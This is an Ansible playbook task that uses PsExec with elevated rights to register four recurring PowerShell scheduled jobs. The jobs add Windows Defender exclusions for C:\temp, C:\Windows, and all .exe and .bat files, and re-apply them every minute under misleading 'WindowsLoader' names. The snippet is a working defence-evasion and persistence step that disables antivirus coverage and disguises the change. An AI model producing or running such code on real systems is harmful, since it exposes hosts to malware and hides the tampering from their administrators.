    -
      name:  Reset Windows Defender every minute
      win_psexec:
        command: '{{ item }}'
        executable: C:\temp\PsExec.exe
        elevated: yes
        nobanner: yes
        interactive: yes
      with_items:
        - powershell.exe Register-ScheduledJob -Name 'WindowsLoader1' -ScriptBlock { Add-MpPreference -ExclusionPath "C:\temp" } -RunNow -RunEvery 00:01:00
        - powershell.exe Register-ScheduledJob -Name 'WindowsLoaderv22' -ScriptBlock { Add-MpPreference -ExclusionPath "C:\Windows" } -RunNow -RunEvery 00:01:00
        - powershell.exe Register-ScheduledJob -Name 'WindowsLoaderv33' -ScriptBlock { Add-MpPreference -ExclusionExtension ".exe" } -RunNow -RunEvery 00:01:00
        - powershell.exe Register-ScheduledJob -Name 'WindowsLoaderv44' -ScriptBlock { Add-MpPreference -ExclusionExtension ".bat" } -RunNow -RunEvery 00:01:00
